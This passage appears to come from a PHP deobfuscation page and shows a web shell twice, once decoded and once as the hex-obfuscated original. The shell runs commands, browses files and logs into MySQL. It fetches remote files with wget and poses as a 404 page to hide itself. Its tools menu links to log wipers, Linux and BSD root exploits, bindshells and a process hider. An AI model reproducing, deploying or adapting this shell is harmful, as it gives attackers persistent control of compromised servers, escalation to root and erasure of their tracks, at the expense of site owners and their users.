"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" . "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" . "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", "script" => "R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" . "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" . "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); header("Content-type: image/gif"); echo base64_decode($images[$img]); die; } goto oKKh5; ipa7I: $email = ''; goto eyRfb; j0T9v: function lookup() { style(); global $servinf; $script = "import urllib, urllib2, sys, re
req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))\xa site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())\xa for i in xrange(0,len(site)):\xa print site[i]"; $handle = fopen("lookup.py", "w"); fwrite($handle, $script); fclose($handle); echo "<h4>Domains</h4>"; echo "<ul>"; $cmd = exec("python lookup.py " . $servinf[0], $ret); foreach ($ret as $site) { echo "<li>" . $site . "
"; } unlink("lookup.py"); } goto AB80q; a_aHJ: function grab($file) { style(); $updir = $_POST["loc"]; $filex = array_pop(explode("/", $file)); if (exec("wget {$file} -b -O {$updir}/{$filex}")) { die("File has been uploaded."); } else { die("File upload failed."); } } goto AXVDQ; ysBF_: session_start(); goto WLTYy; ulNOj: $act = $_GET["act"]; goto OwdS2; IEiE7: ?>Did this file decode correctly?
Original Code
<?php
goto idNYz; ztjju: function sqllogin() { session_start(); if ($_SESSION["\x69\163\154\x6f\147\147\145\144\151\156"] == "\164\x72\165\x65") { header("\114\x6f\143\x61\x74\x69\157\x6e\x3a\40\77\x61\x63\x74\x3d\163\161\x6c"); } style(); echo "\x3c\x66\157\x72\x6d\x20\155\145\x74\150\157\144\x3d\x27\160\157\x73\164\47\40\x61\x63\164\151\157\156\x3d\x27\77\141\143\x74\x3d\x73\x71\x6c\47\x3e"; echo "\x55\163\145\162\x3a\x3c\x62\x72\x3e\74\151\156\160\x75\x74\x20\164\171\160\145\x3d\x27\164\145\170\x74\47\x20\156\141\x6d\x65\75\47\x75\x6e\47\x20\x73\x69\172\145\75\47\63\60\x27\x3e\x3c\142\x72\76\xa"; echo "\120\141\x73\x73\x77\157\x72\x64\x3a\x3c\142\x72\x3e\74\151\x6e\160\165\x74\x20\164\171\x70\145\75\x27\164\x65\x78\164\47\x20\x6e\x61\155\x65\75\x27\160\x77\47\40\x73\x69\172\145\x3d\x27\63\x30\47\x3e\x3c\142\162\x3e\xa"; echo "\x48\157\x73\x74\72\x3c\142\x72\76\74\151\x6e\160\165\x74\40\x74\171\160\145\75\47\164\145\170\x74\47\x20\x6e\141\155\x65\x3d\x27\x68\157\x73\164\47\x20\163\151\172\x65\x3d\47\x33\60\x27\x20\166\141\154\165\x65\x3d\x27\154\x6f\143\x61\154\150\x6f\163\x74\47\x3e\74\142\x72\x3e\12"; echo "\x50\x6f\162\164\72\74\x62\162\x3e\74\151\156\160\165\x74\40\x74\x79\160\145\75\47\x74\x65\x78\164\47\40\x6e\141\x6d\145\75\47\160\x6f\162\164\47\40\x73\151\x7a\145\x3d\x27\x33\60\x27\40\x76\141\154\165\x65\x3d\47\63\63\60\66\x27\x3e\x3c\142\x72\76\12"; echo "\74\151\x6e\x70\165\x74\x20\164\x79\x70\x65\75\47\x73\x75\x62\x6d\x69\x74\x27\x20\x76\x61\x6c\165\x65\x3d\x27\114\157\147\151\x6e\47\76"; echo "\x3c\57\146\x6f\162\x6d\76"; die; } goto T0ekR; zSPz2: $version = "\61\x2e\63\x20\146\151\156\141\154"; goto mcMx2; ngrYW: $f = $_GET["\x66"]; goto QhnaF; J6HYv: $contents = $_POST["\143\157\156\164\145\156\164\163"]; goto WHdb0; ijVzm: function sqlinsert() { style(); $sqlcon = @mysql_connect($_SESSION["\x73\x71\x6c\137\150\x6f\x73\x74"] . "\72" . $_SESSION["\x73\161\154\x5f\160\x6f\162\x74"], $_SESSION["\x73\161\x6c\x5f\165\163\145\x72"], $_SESSION["\163\x71\x6c\137\x70\141\x73\x73\x77\x6f\162\x64"]); mysql_select_db($_GET["\144\142"], $sqlcon); if ($_POST["\x69\156\x73"]) { unset($_POST["\151\156\x73"]); $fields = array_flip($_POST); $f = implode("\54", $fields); $v = implode("\54", $_POST); $query = "\111\x4e\x53\x45\122\124\x20\111\116\x54\117\x20" . $_GET["\164\x61\x62\154\145"] . "\40\x28" . $f . "\51\40\126\x41\x4c\x55\105\x53\40\x28" . $v . "\51"; mysql_query($query, $sqlcon) or die(mysql_error()); die("\122\x6f\x77\x20\x69\x6e\x73\x65\x72\x74\x65\144\56\74\142\x72\76\xa\x3c\141\40\x68\162\145\x66\75\x27\x3f\x61\x63\x74\x3d\x73\x71\x6c\46\144\142\75" . $_GET["\x64\142"] . "\x26\164\x61\142\x6c\145\x3d" . $_GET["\164\x61\142\154\x65"] . "\47\x3e\107\157\x20\x62\141\x63\153\74\57\x61\76"); } $query = "\123\x48\117\x57\40\x43\x4f\x4c\x55\115\x4e\x53\x20\106\x52\x4f\115\x20" . $_GET["\x74\x61\x62\154\145"]; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); echo "\74\x66\157\x72\x6d\x20\x6d\145\x74\x68\157\144\75\x27\120\x4f\123\124\47\x3e"; echo "\x3c\x74\x61\x62\x6c\x65\76"; while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row["\x46\x69\145\154\x64"]); echo "\x3c\164\162\x3e\74\x74\x64\x3e\x3c\142\x3e" . $fields[$i] . "\74\x2f\x62\76\74\164\x64\76\x3c\x69\156\x70\x75\x74\40\x74\171\160\145\75\x27\x74\145\x78\x74\x27\40\x6e\141\x6d\x65\75\x27" . $fields[$i] . "\x27\x3e\74\x62\162\76\12"; $i++; } echo "\x3c\57\x74\141\142\154\145\76"; echo "\74\x62\x72\x3e\xa\x3c\151\156\160\x75\x74\40\164\x79\160\145\75\47\163\165\x62\155\151\x74\x27\x20\x76\141\x6c\165\x65\x3d\x27\111\156\163\145\x72\164\x27\40\x6e\141\x6d\x65\x3d\x27\x69\x6e\163\x27\x3e"; echo "\74\x2f\x66\157\162\x6d\x3e"; } goto KufTS; AXVDQ: function tools() { global $curdir; style(); $tools = array("\x2d\x2d\55\40\x4c\x6f\x67\x20\x77\151\160\145\x72\163\x20\55\55\x2d" => "\61", "\x56\x61\x6e\x69\163\x68\x32\x2e\164\147\172" => "\150\x74\164\160\x3a\x2f\x2f\160\x61\143\x6b\145\164\163\164\157\162\x6d\x73\x65\143\165\x72\x69\164\171\x2e\x6f\162\x67\x2f\125\x4e\111\x58\x2f\160\145\x6e\x65\x74\162\x61\x74\151\x6f\156\57\x6c\x6f\147\x2d\x77\151\x70\145\162\x73\57\166\x61\156\151\163\150\x32\56\x74\x67\172", "\x43\154\x6f\141\x6b\56\x63" => "\x68\x74\x74\x70\x3a\57\x2f\x70\141\143\153\x65\164\x73\x74\157\x72\155\x73\145\x63\165\162\151\x74\x79\x2e\x6f\162\147\x2f\x55\x4e\111\130\57\x70\145\156\x65\x74\162\141\164\151\x6f\156\x2f\154\157\147\x2d\167\151\160\x65\x72\163\57\x63\x6c\x6f\141\x6b\56\143", "\147\150\60\163\164\x2e\163\x68" => "\x68\164\x74\160\x3a\57\57\x70\141\143\153\145\164\163\x74\x6f\x72\x6d\163\145\x63\x75\162\x69\x74\171\x2e\157\162\147\x2f\125\116\111\130\57\x70\145\156\x65\x74\x72\141\x74\x69\157\156\x2f\154\157\147\x2d\x77\x69\x70\x65\162\163\57\x67\150\60\163\x74\x2e\163\x68", "\x2d\x2d\55\x20\120\162\x69\166\x20\105\x73\143\x61\x6c\141\164\x69\157\156\x20\x2d\55\x2d" => "\62", "\x68\60\60\x6c\x79\163\150\x69\164\40\x2d\40\114\x69\156\165\x78\x20\x32\56\x36\x20\x41\114\114" => "\x68\x74\x74\x70\x3a\x2f\57\163\x6f\x6d\x65\x73\150\x69\x74\x2e\156\145\164\57\146\x69\154\x65\163\x2f\x78\160\x6c\57\x68\x30\60\x6c\x79\x73\150\151\x74", "\153\55\x72\x61\x64\x33\40\x2d\40\114\151\156\x75\170\40\74\75\x20\62\56\x36\56\x31\61" => "\x68\x74\x74\x70\72\x2f\57\163\157\155\x65\163\x68\151\164\56\x6e\x65\164\x2f\146\x69\x6c\145\163\57\x78\x70\x6c\x2f\x6b\x72\141\x64\x33", "\x72\x61\160\x74\157\x72\40\x2d\x20\x4c\x69\x6e\x75\170\40\74\75\x20\62\x2e\66\x2e\x31\x37\x2e\x34" => "\150\x74\164\x70\72\x2f\x2f\x73\x6f\155\145\x73\x68\151\164\56\156\145\x74\x2f\146\x69\154\x65\x73\57\170\160\154\57\x72\x61\160\164\157\162", "\x72\157\x6f\164\x62\163\x64\x20\x2d\x20\x42\123\x44\x20\166\x3f" => "\x68\x74\x74\x70\72\57\x2f\163\x6f\x6d\145\x73\150\151\x74\56\x6e\x65\x74\57\x66\151\154\145\x73\57\x78\160\154\57\162\x6f\x6f\x74\142\163\x64", "\x2d\x2d\x2d\40\x42\151\156\144\163\x68\x65\x6c\x6c\163\x20\x2d\x2d\x2d" => "\63", "\124\110\x43\x20\162\x77\x77\x77\x73\x68\x65\x6c\154\x2d\x31\56\x36\x2e\x70\145\162\154" => "\x68\164\x74\x70\x3a\x2f\x2f\x70\x61\x63\x6b\x65\164\x73\164\157\162\155\x73\x65\x63\x75\x72\x69\164\171\56\x6f\x72\x67\57\x67\162\157\x75\x70\163\57\164\x68\x63\x2f\162\x77\167\x77\x73\150\145\154\x6c\55\61\56\66\x2e\x70\145\162\x6c", "\102\141\163\151\x63\x20\120\x65\x72\x6c\x20\x62\x69\156\x64\x73\150\145\154\x6c" => "\150\164\164\x70\x3a\57\57\160\141\x63\153\x65\164\163\x74\157\162\x6d\163\x65\143\x75\162\x69\164\171\56\x6f\162\147\x2f\147\162\x6f\165\x70\x73\57\163\x79\156\x6e\145\162\147\171\57\142\151\x6e\144\163\x68\145\x6c\x6c\55\x75\x6e\151\170", "\55\55\x2d\40\x4d\151\163\143\40\x2d\x2d\x2d" => "\x34", "\115\x4f\x43\x4b\123\40\x53\117\103\x4b\x53\x34\x20\120\162\157\170\171" => "\150\x74\x74\x70\72\57\57\163\165\160\x65\x72\142\x2d\145\141\163\x74\x2e\144\x6c\x2e\163\157\165\x72\x63\x65\146\157\x72\x67\145\56\x6e\145\x74\x2f\163\x6f\165\x72\143\145\x66\x6f\162\x67\145\57\x6d\x6f\x63\153\163\57\x6d\x6f\x63\x6b\163\x2d\x30\x2e\60\x2e\x32\x2e\164\141\x72\56\147\x7a", "\x78\160\x73\x2e\143\40\50\160\162\x6f\143\x20\150\x69\x64\x65\162\x29" => "\x68\164\164\160\x3a\x2f\x2f\x70\141\143\x6b\x65\x74\x73\164\157\162\x6d\163\x65\143\165\162\151\164\171\56\x6f\x72\147\57\x67\x72\157\165\160\163\57\x73\x68\x61\144\x6f\167\160\145\156\147\x75\x69\156\x2f\165\156\x69\170\x2d\164\x6f\x6f\x6c\163\57\x78\160\x73\56\x63"); $names = array_flip($tools); echo "\74\142\x3e\x54\x6f\157\154\163\72\x3c\x2f\142\76"; echo "\74\x66\157\162\155\x20\x6d\145\164\150\157\144\75\47\x70\x6f\x73\164\47\x3e"; echo "\x3c\x62\76\x4f\x75\164\160\165\164\x20\x44\151\162\x65\143\x74\x6f\x72\x79\74\57\142\x3e\74\x62\x72\x3e"; echo "\x3c\151\156\160\x75\164\x20\164\171\x70\x65\75\x27\164\x65\170\164\47\x20\x6e\141\x6d\145\x3d\x27\x6c\157\143\47\40\163\x69\172\145\x3d\x27\66\65\x27\40\x76\x61\154\x75\145\x3d\x27" . $curdir . "\47\x3e\74\142\162\76\74\x62\x72\x3e"; echo "\x3c\163\x65\x6c\145\143\164\x20\156\141\155\145\75\x27\x67\146\47\x20\x73\x74\x79\154\145\75\47\x61\154\151\x67\156\72\143\145\156\x74\x65\x72\73\x27\x3e"; foreach ($tools as $tool) { echo "\74\157\x70\164\151\157\x6e\x20\x76\x61\x6c\x75\145\x3d\47" . $tool . "\x27\76" . $names[$tool] . "\x3c\x2f\x6f\x70\x74\151\157\156\x3e\xa"; } echo "\x3c\57\163\145\154\145\x63\164\76"; echo "\x3c\142\x72\x3e\74\151\x6e\160\x75\x74\40\164\x79\160\145\75\47\x73\165\x62\x6d\x69\x74\47\40\x76\141\x6c\x75\145\75\x27\107\162\141\142\47\76"; echo "\74\x2f\x66\157\162\x6d\x3e"; } goto j0T9v; ZJa2z: function hide() { global $self, $soft, $servip, $servport; die("\74\41\104\117\103\124\131\x50\105\40\x48\x54\115\x4c\x20\120\125\x42\114\111\x43\40\47\x2d\57\57\x49\x45\x54\106\57\57\x44\x54\x44\x20\110\124\x4d\114\x20\x32\x2e\x30\57\x2f\105\x4e\47\x3e\12\x3c\110\124\115\114\x3e\x3c\110\x45\x41\x44\x3e\12\x3c\124\111\x54\x4c\105\76\64\x30\64\40\x4e\157\x74\x20\x46\x6f\165\x6e\144\74\x2f\124\111\124\x4c\x45\76\12\x3c\57\x48\x45\101\x44\76\74\102\x4f\104\131\76\12\x3c\x48\x31\76\116\157\164\x20\106\157\165\x6e\144\x3c\57\x48\x31\x3e\xa\124\150\x65\x20\162\145\x71\165\x65\x73\164\x65\144\40\x55\x52\x4c\x20{$self}\x20\167\x61\163\x20\x6e\x6f\164\40\146\157\x75\x6e\x64\x20\157\156\40\164\x68\151\163\40\x73\x65\x72\166\145\162\56\74\x50\76\12\74\x50\76\x41\x64\x64\151\164\151\x6f\x6e\x61\154\x6c\x79\x2c\x20\141\40\64\x30\64\40\x4e\157\x74\x20\106\x6f\x75\x6e\x64\12\145\x72\162\157\x72\40\x77\x61\163\x20\x65\x6e\x63\x6f\165\x6e\164\x65\x72\145\x64\40\x77\x68\x69\154\x65\x20\164\162\171\x69\x6e\x67\x20\x74\x6f\x20\165\x73\x65\40\x61\x6e\x20\x45\x72\162\157\162\x44\x6f\143\165\x6d\145\156\164\x20\164\x6f\x20\150\x61\x6e\144\x6c\145\40\164\150\x65\x20\162\145\x71\165\x65\163\164\x2e\12\74\x48\x52\76\xa\74\x41\104\x44\x52\x45\x53\123\x3e{$soft}\40\123\x65\x72\x76\145\x72\40\x61\x74\40{$servip}\40\x50\x6f\x72\164\40{$servport}\x3c\57\x41\104\104\x52\x45\123\x53\76\xa\74\x2f\102\x4f\x44\x59\x3e\x3c\x2f\110\x54\x4d\114\76"); } goto BamoG; LmwYc: function files($dir) { style(); global $self, $curdir; if ($dir == '') { $dir = $curdir; } $dirx = explode("\x2f", $dir); $files = array(); $folders = array(); echo "\x3c\x66\x6f\x72\x6d\40\155\145\x74\x68\x6f\x64\x3d\47\107\x45\x54\x27\x3e"; echo "\74\151\156\x70\x75\x74\x20\164\x79\x70\145\x3d\x27\x74\145\170\164\47\40\x6e\141\155\x65\x3d\x27\144\151\x72\x27\x20\166\x61\154\x75\x65\x3d\47" . $dir . "\x27\40\163\x69\172\145\75\x27\64\x30\47\x3e"; echo "\74\151\x6e\x70\165\x74\40\164\x79\160\x65\x3d\x27\163\165\142\x6d\x69\x74\x27\x20\166\x61\x6c\165\x65\x3d\x27\107\157\x27\76"; echo "\x3c\x2f\146\x6f\x72\x6d\x3e"; echo "\x3c\x68\64\76\106\x69\154\x65\x20\x6c\151\x73\164\x20\146\x6f\162\40"; for ($i = 0; $i < count($dirx); $i++) { $totalpath .= $dirx[$i] . "\57"; echo "\74\x61\40\x68\162\x65\x66\75\x27\77\x64\151\162\75" . $totalpath . "\47\76{$dirx[$i]}\74\57\x61\x3e" . "\57"; } echo "\74\57\x68\x34\76"; echo "\x3c\x74\x61\142\154\145\76"; echo "\x3c\164\x68\76\106\x69\x6c\145\x20\x4e\x61\x6d\x65\74\164\150\76\106\151\x6c\145\x20\123\x69\x7a\x65\x3c\57\x74\150\76"; if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (is_dir($dir . "\57" . $link)) { $file = array(); if (is_writable($dir . "\x2f" . $link)) { $file["\x70\x65\162\155"] = "\x77\x72\x69\164\145"; } elseif (is_readable($dir . "\x2f" . $link)) { $file["\x70\145\162\155"] = "\x72\145\x61\144"; } else { $file["\160\x65\162\x6d"] = "\156\157\156\145"; } switch ($file["\x70\x65\x72\x6d"]) { case "\167\162\x69\164\x65": @($file["\154\x69\156\x6b"] = "\74\x61\40\150\162\145\x66\x3d\x27\x3f\144\151\x72\x3d{$dir}\57{$link}\x27\76\74\146\x6f\156\x74\40\x63\x6f\154\157\x72\75\x27\147\x72\145\145\x6e\47\76{$link}\74\57\x66\x6f\156\164\x3e\74\x2f\141\x3e"); break; case "\x72\x65\x61\144": @($file["\154\x69\156\x6b"] = "\x3c\x61\40\150\x72\x65\146\75\47\x3f\144\x69\162\x3d{$dir}\x2f{$link}\47\x3e\x3c\x66\157\156\x74\x20\143\157\154\x6f\x72\75\x27\171\145\154\x6c\x6f\167\x27\76{$link}\74\57\x66\x6f\x6e\164\x3e\74\57\x61\76"); break; case "\156\157\x6e\145": @($file["\154\x69\156\x6b"] = "\x3c\141\40\x68\x72\x65\146\x3d\47\77\144\x69\x72\75{$dir}\x2f{$link}\47\76\74\x66\x6f\156\x74\40\143\157\x6c\x6f\162\75\47\x72\x65\x64\47\x3e{$link}\x3c\x2f\146\x6f\156\164\x3e\x3c\57\x61\x3e"); break; default: @($file["\x6c\x69\156\x6b"] = "\x3c\141\x20\x68\162\x65\x66\x3d\x27\77\144\x69\162\75{$dir}\57{$link}\47\x3e\74\146\157\x6e\164\40\143\157\x6c\157\162\75\47\162\145\x64\x27\x3e{$link}\74\57\146\157\156\x74\x3e\x3c\x2f\x61\x3e"); break; } @($file["\x69\x63\x6f\x6e"] = "\x66\x6f\x6c\144\145\x72"); if ($_SERVER["\121\x55\105\x52\131\137\x53\x54\x52\x49\x4e\x47"]) { $folder = "\74\151\x6d\x67\x20\x73\x72\143\x3d\x27\x3f" . $_SERVER["\121\x55\x45\122\x59\x5f\123\x54\x52\111\x4e\107"] . "\46\x69\155\x67\75" . $file["\x69\x63\157\156"] . "\47\76\52" . $file["\154\151\156\x6b"]; } else { $folder = "\x3c\151\x6d\147\40\163\x72\x63\75\47\77\151\155\x67\x3d" . $file["\x69\x63\157\156"] . "\47\76\x2a" . $file["\154\151\x6e\x6b"]; } array_push($folders, $folder); } else { $file = array(); $ext = strtolower(end(explode("\56", $link))); if (!($file["\163\151\x7a\145"] = nicesize(@filesize($dir . "\x2f" . $link)))) { $file["\163\151\x7a\x65"] = "\x30\102"; } if (is_writable($dir . "\57" . $link)) { $file["\x70\145\x72\155"] = "\167\162\151\164\x65"; } elseif (is_readable($dir . "\57" . $link)) { $file["\x70\x65\x72\155"] = "\x72\x65\141\144"; } else { $file["\160\145\162\155"] = "\156\157\156\145"; } switch ($file["\160\145\162\x6d"]) { case "\167\162\151\x74\145": @($file["\x6c\151\156\x6b"] = "\x3c\x61\x20\150\x72\145\x66\x3d\47\x3f\141\x63\x74\75\166\x69\145\167\46\x66\75" . $link . "\x26\144\x69\x72\75{$dir}\47\76\74\146\x6f\156\164\40\x63\157\154\157\162\x3d\47\x67\x72\145\145\156\x27\76{$link}\74\x2f\146\157\156\x74\x3e\x3c\x2f\141\76"); break; case "\162\x65\x61\144": @($file["\154\x69\156\x6b"] = "\74\x61\x20\x68\x72\x65\x66\75\47\x3f\x61\x63\x74\75\x76\151\145\167\46\x66\x3d" . $link . "\x26\144\151\x72\x3d{$dir}\x27\76\74\x66\x6f\x6e\164\40\x63\x6f\x6c\x6f\x72\75\47\x79\145\154\154\157\167\x27\76{$link}\x3c\57\146\x6f\156\164\x3e\x3c\57\x61\x3e"); break; case "\156\x6f\156\145": @($file["\x6c\151\156\x6b"] = "\x3c\x61\x20\150\x72\145\x66\x3d\47\77\x61\143\164\75\x76\x69\145\167\x26\146\75" . $link . "\x26\144\x69\x72\75{$dir}\47\76\74\x66\157\x6e\164\40\x63\x6f\154\157\x72\x3d\47\162\145\144\47\x3e{$link}\x3c\x2f\146\157\x6e\164\76\74\57\141\x3e"); break; default: @($file["\154\x69\x6e\153"] = "\x3c\141\40\150\162\145\x66\75\47\77\141\143\x74\75\166\151\x65\167\46\x66\75" . $link . "\46\x64\151\x72\x3d{$dir}\x27\x3e\x3c\146\157\156\x74\x20\143\157\154\157\162\x3d\x27\162\145\144\47\x3e{$link}\74\x2f\x61\x3e\74\57\x66\157\x6e\164\76"); break; } switch ($ext) { case "\145\x78\x65": case "\143\157\x6d": case "\152\141\162": case '': $file["\151\143\x6f\156"] = "\x62\x69\x6e\x61\x72\171"; break; case "\152\x70\x67": case "\x67\x69\146": case "\x70\x6e\x67": case "\142\x6d\160": $file["\x69\143\x6f\x6e"] = "\x69\155\141\x67\x65"; break; case "\x7a\151\x70": case "\x74\141\x72": case "\x72\x61\x72": case "\147\x7a": case "\x63\141\x62": case "\142\172\62": case "\147\x7a\x69\160": $file["\x69\143\157\x6e"] = "\x63\157\x6d\x70\162\145\x73\x73\x65\x64"; break; case "\x74\170\164": case "\x64\x6f\143": case "\x70\144\146": case "\150\164\x6d": case "\x68\164\155\154": case "\162\164\x66": $file["\x69\x63\157\156"] = "\164\x65\x78\x74"; break; case "\167\x61\x76": case "\155\x70\x33": case "\x6d\160\x34": case "\167\x6d\x61": $file["\x69\143\157\x6e"] = "\x73\157\165\x6e\x64"; break; case "\152\x73": case "\x76\x62\163": case "\143": case "\150": case "\x73\x68": case "\160\154": case "\x70\171": case "\160\150\160": case "\150": $file["\x69\143\157\156"] = "\x73\x63\x72\151\160\x74"; break; default: $file["\151\x63\157\156"] = "\165\x6e\153\x6e\x6f\167\156"; break; } if ($_SERVER["\121\x55\x45\x52\131\137\123\124\122\x49\116\x47"]) { $file = "\x3c\164\x72\x3e\74\x74\x64\76\x3c\151\155\x67\x20\x73\x72\x63\x3d\47\77" . $_SERVER["\x51\x55\x45\122\131\137\123\x54\122\111\x4e\107"] . "\46\x69\x6d\x67\75" . $file["\x69\x63\157\156"] . "\47\x20\150\x65\x69\x67\x68\x74\x3d\47\x31\70\x27\x20\167\x69\144\x74\150\x3d\x27\x31\70\x27\76\x2a" . $file["\x6c\151\x6e\x6b"] . "\x3c\57\x74\144\x3e\74\164\144\x3e" . $file["\163\x69\x7a\x65"] . "\x3c\x2f\x74\144\x3e\x3c\57\164\x72\x3e\xa"; } else { $file = "\74\x74\162\76\x3c\x74\144\x3e\x3c\151\x6d\147\x20\163\x72\143\x3d\x27\77\151\x6d\147\x3d" . $file["\x69\x63\x6f\x6e"] . "\x27\40\150\x65\x69\147\150\164\75\x27\x31\x38\x27\40\x77\151\144\x74\x68\x3d\x27\x31\70\x27\x3e\52" . $file["\x6c\151\x6e\153"] . "\x3c\x74\x64\x3e" . $file["\x73\151\172\x65"] . "\x3c\57\164\x64\x3e\x3c\57\164\162\76\xa"; } array_push($files, $file); } } foreach ($folders as $folder) { echo "\74\x74\x72\x3e\x3c\x74\x64\76{$folder}\74\x2f\x74\144\76\74\164\144\x3e\104\x49\x52\74\x2f\164\x64\76\74\57\164\162\76\12"; } foreach ($files as $file) { echo $file; } echo "\74\57\164\x61\142\154\x65\76"; closedir($handle); } } goto L8uF6; QhnaF: $curdir = cleandir(getcwd()); goto FyhAX; rwsQf: function main() { global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version; style(); $act = array("\x63\x6d\x64" => "\x43\x6f\x6d\x6d\x61\x6e\x64\40\105\x78\x65\143\x75\x74\x65", "\146\x69\x6c\145\163" => "\106\x69\x6c\x65\40\126\x69\x65\167", "\160\150\x70\x69\x6e\x66\157" => "\120\110\120\40\x69\x6e\x66\x6f", "\x70\150\x70\x65\170\x65\143" => "\x50\x48\x50\x20\x45\170\x65\143\x75\164\145", "\164\x6f\157\154\163" => "\x54\x6f\x6f\x6c\x73", "\x73\161\x6c\154\x6f\x67\151\x6e" => "\123\x51\114", "\x65\x6d\141\151\154" => "\105\x6d\141\x69\x6c", "\x75\x70\x6c\157\x61\x64" => "\107\x65\164\40\106\151\154\x65\163", "\x6c\x6f\x6f\x6b\165\160" => "\114\151\163\x74\x20\x44\157\155\141\151\x6e\x73", "\142\x73\150\x65\x6c\154" => "\102\x69\x6e\x64\163\x68\x65\154\154", "\153\151\x6c\x6c" => "\x4b\151\154\x6c\40\x53\150\145\154\154"); $capt = array_flip($act); echo "\74\x66\x6f\x72\155\40\155\145\164\x68\x6f\144\75\x27\x47\x45\124\47\40\x6e\141\x6d\145\x3d\x27\x73\x68\145\x6c\154\x27\76"; echo "\74\142\x3e\x48\157\x73\x74\x3a\74\57\142\76\x20\74\163\160\x61\156\40\143\x6c\x61\x73\x73\x3d\x27\151\x6e\x66\47\x3e" . $servip . "\74\57\163\160\141\156\x3e\x3c\142\x72\x3e"; echo "\74\x62\76\123\x65\x72\x76\x65\x72\x20\x73\157\x66\x74\x77\x61\162\145\x3a\x3c\x2f\142\76\40\x3c\x73\x70\x61\156\40\x63\x6c\x61\163\x73\x3d\47\151\x6e\146\47\76" . $soft . "\74\x2f\163\x70\141\156\76\x3c\x62\162\76"; echo "\x3c\142\x3e\x55\156\x61\x6d\145\72\x3c\x2f\142\76\40\74\163\x70\x61\156\x20\x63\154\x61\163\x73\x3d\47\151\x6e\x66\47\76" . $uname . "\x3c\57\x73\x70\x61\156\76\x3c\x62\162\76"; echo "\74\x62\x3e\123\150\145\x6c\154\40\x44\x69\x72\x65\143\x74\157\x72\x79\72\74\x2f\142\x3e\40\74\x73\x70\141\x6e\40\143\x6c\141\163\163\75\x27\x69\x6e\x66\x27\x3e" . getcwd() . "\x3c\x2f\163\160\141\156\76\x3c\x62\x72\76"; echo "\x3c\x64\x69\x76\x20\163\164\x79\154\x65\75\47\144\x69\163\x70\154\x61\171\72\156\x6f\156\x65\47\x20\151\144\75\x27\151\x6e\146\x6f\47\76"; echo "\x3c\142\76\x43\x75\x72\162\145\156\164\40\x55\163\145\162\72\x3c\x2f\x62\76\40\x3c\163\160\x61\x6e\40\x63\x6c\141\x73\163\75\47\151\156\146\47\x3e" . $curuser . "\x3c\x2f\163\x70\x61\156\x3e\x3c\x62\162\76"; echo "\x3c\142\x3e\111\x44\x3a\74\57\x62\x3e\40\74\163\160\x61\156\x20\x63\154\x61\x73\x73\75\x27\x69\156\146\47\x3e" . @exec("\x69\x64") . "\74\x2f\163\x70\141\156\x3e\74\142\162\x3e"; if (@ini_get("\163\x61\x66\145\x5f\x6d\157\144\x65") != '') { echo "\74\142\76\x53\141\x66\145\155\x6f\x64\x65\x3a\x3c\57\x62\76\x20\74\146\157\156\x74\x20\143\x6f\x6c\157\162\x3d\47\x72\x65\x64\x27\x3e\117\x4e\x3c\x2f\146\x6f\156\x74\76"; } else { echo "\74\142\76\123\x61\146\x65\155\157\x64\x65\x3a\74\x2f\x62\76\x20\74\x66\x6f\156\x74\40\x63\157\x6c\x6f\x72\x3d\47\147\162\145\x65\x6e\x27\x3e\117\x46\106\x3c\57\146\x6f\x6e\164\x3e"; } echo "\xa\74\142\162\76\12"; if (@ini_get("\x6f\160\145\156\137\142\x61\x73\x65\144\x69\162") != '') { echo "\74\142\x3e\117\160\x65\156\40\102\x61\x73\x65\x20\x44\151\162\72\74\x2f\142\x3e\40\x3c\146\157\156\164\x20\143\x6f\154\157\x72\75\47\x72\145\x64\47\76\x4f\x4e\74\57\146\x6f\x6e\164\x3e\40\x5b\40\x3c\x73\160\x61\156\x20\x63\154\x61\x73\163\75\47\151\156\146\47\76" . ini_get("\x6f\160\x65\x6e\137\x62\x61\x73\145\x64\151\162") . "\74\57\x73\160\x61\x6e\76\40\x5d"; } else { echo "\x3c\x62\76\x4f\160\x65\x6e\x20\102\x61\163\145\40\x44\x69\162\72\74\x2f\x62\76\x20\74\x66\157\156\x74\x20\x63\x6f\154\x6f\162\75\x27\x67\162\x65\x65\x6e\47\76\x4f\x46\106\74\x2f\x66\157\x6e\x74\x3e"; } echo "\xa\x3c\142\162\x3e\12"; if (@ini_get("\x64\x69\x73\x61\142\154\145\x5f\146\165\156\x63\x74\x69\x6f\156\x73") != '') { echo "\74\x62\76\104\x69\x73\x61\x62\154\145\x64\x20\146\165\156\143\x74\151\x6f\156\163\x3a\x3c\x2f\142\76\40" . @ini_get("\144\151\x73\141\x62\154\145\x5f\x66\x75\156\x63\x74\151\157\x6e\163"); } else { echo "\74\142\x3e\104\x69\163\141\142\154\x65\x64\x20\x66\x75\x6e\143\x74\151\157\x6e\163\x3a\x3c\x2f\x62\x3e\x20\116\x6f\156\x65"; } echo "\12\74\x62\162\76\xa"; if (@function_exists(mysql_connect)) { echo "\x3c\142\x3e\115\x79\x53\121\114\72\74\x2f\x62\x3e\40\x3c\x66\x6f\156\164\x20\143\x6f\154\157\x72\75\x27\147\162\145\145\156\47\x3e\x4f\116\74\x2f\x66\x6f\156\164\x3e"; } else { echo 